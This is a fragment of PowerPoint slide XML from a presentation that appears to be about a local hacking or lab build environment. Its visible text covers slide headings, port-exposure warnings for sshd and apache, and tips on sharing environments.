                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>network.</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1536700">
              <a:lnSpc>
                <a:spcPct val="101400"/>
              </a:lnSpc>
            </a:pP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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>!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] </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Port 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2222 (</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>sshd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) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>is visible to the outside </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>world.  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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>!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] </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Port </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>8080 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>is visible to the outside</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="50" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>world.</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="125499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-140" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>plugin is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>not published </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>yet. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>don’t </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>want </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>wait </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>just </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>let </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>me </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>know. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>I </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>will </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>send </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>copy </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>current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-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>code-base.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68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0" y="190436"/>
            <a:ext cx="1692275" cy="1515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F8007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>THE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-204" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-145" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>FUTURE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  <a:spcBef>
                <a:spcPts val="865"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Environment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marL="302260" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="E20074"/>
              </a:buClr>
              <a:buSzPct val="72727"/>
              <a:buFont typeface="Aroania"/>
              <a:buChar char="▶"/>
              <a:tabLst>
                <a:tab pos="302895" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Instructions</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="302260" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="334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02895" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Build-Environment</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="302260" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="330"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="E20074"/>
              </a:buClr>
              <a:buSzPct val="72727"/>
              <a:buFont typeface="Aroania"/>
              <a:buChar char="▶"/>
              <a:tabLst>
                <a:tab pos="302895" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Examples </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shared </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Folder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589" y="2302939"/>
            <a:ext cx="39185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25" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Tip: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Share </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>your environments </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>friends </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>colleagues </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>version </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>control </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>system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spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(CSV).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69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122" y="190436"/>
            <a:ext cx="5695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F8007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>THE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-260" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-170" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>END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7619" y="1595564"/>
            <a:ext cx="458470" cy="175895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="458469" h="175894">
                <a:moveTo>
                  <a:pt x="0" y="175780"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="48349" y="140183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92026" y="110360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132569" y="85647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="171517" y="65382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210410" y="48899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250787" y="35536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294186" y="24628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342147" y="15512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="396209" y="7524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457911" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="53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299676" y="1520327"/>
            <a:ext cx="381000" cy="67310"/>
            <a:chOff x="3299676" y="1520327"/>
            <a:chExt cx="381000" cy="67310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3299676" y="1520329"/>
              <a:ext cx="108585" cy="51435"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="108585" h="51434">
                  <a:moveTo>
                    <a:pt x="35674" y="3022"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="3022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="7924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15024" y="7924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15024" y="50698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20548" y="50698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20548" y="7924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35674" y="7924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35674" y="3022"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="108585" h="51434">
                  <a:moveTo>
                    <a:pt x="70383" y="22923"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="69265" y="19608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67043" y="17526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64884" y="15430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61645" y="14389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54762" y="14389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52489" y="14884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48602" y="16840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47129" y="18199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46075" y="19926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45669" y="19926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45872" y="18669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45974" y="17157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45974" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40551" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40551" y="50698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45974" y="50698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45974" y="27381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46837" y="24041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48577" y="22009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50304" y="19926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53060" y="18884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59588" y="18884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61645" y="19608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64287" y="22529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64960" y="24688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64960" y="50698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70383" y="50698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70383" y="22923"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="108585" h="51434">
                  <a:moveTo>
                    <a:pt x="108115" y="25552"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106794" y="21691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104267" y="18884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102273" y="16611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102273" y="26022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102273" y="29413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83604" y="29413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83883" y="26022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84861" y="23520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88252" y="19812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90589" y="18884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96278" y="18884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98450" y="19786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100063" y="21691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101498" y="23418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102273" y="26022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102273" y="16611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101574" y="15798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98031" y="14287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="14287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84988" y="16002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79273" y="22821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77863" y="27406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77863" y="38887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79387" y="43345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82550" y="46621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85509" y="49733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89687" y="51320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97320" y="51320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99364" y="51142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102755" y="50457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104609" y="49860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106553" y="49022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106553" y="46621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106553" y="44234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102806" y="45847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98996" y="46621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91478" y="46621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88633" y="45554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84607" y="41173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83553" y="37973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83502" y="33794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108115" y="33794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108115" y="29413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108115" y="25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32937" y="1520327"/>
              <a:ext cx="247497" cy="667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309061" y="2155939"/>
            <a:ext cx="388696" cy="51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00526" y="564273"/>
            <a:ext cx="366395" cy="67310"/>
            <a:chOff x="200526" y="564273"/>
            <a:chExt cx="366395" cy="67310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="200520" y="564286"/>
              <a:ext cx="108585" cy="51435"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="108585" h="51434">
                  <a:moveTo>
                    <a:pt x="35674" y="3009"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="3009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="7912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15024" y="7912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15024" y="50685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20548" y="50685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20548" y="7912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35674" y="7912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35674" y="3009"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="108585" h="51434">
                  <a:moveTo>
                    <a:pt x="70383" y="22910"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="69265" y="19596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64884" y="15430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61645" y="14389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54762" y="14389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52501" y="14871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48602" y="16852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47117" y="18186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46075" y="19913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45669" y="19913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45872" y="18656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45974" y="17145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45974" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40551" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40551" y="50685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45974" y="50685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45974" y="27381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46837" y="24028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48577" y="21996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50304" y="19913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53073" y="18872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59588" y="18872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61645" y="19596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64287" y="22517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64960" y="24688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64960" y="50685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70383" y="50685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70383" y="22910"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="108585" h="51434">
                  <a:moveTo>
                    <a:pt x="108127" y="25552"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106794" y="21678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104254" y="18872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102285" y="16624"/>
                  </a:lnTo>
                  <a:lnTo>
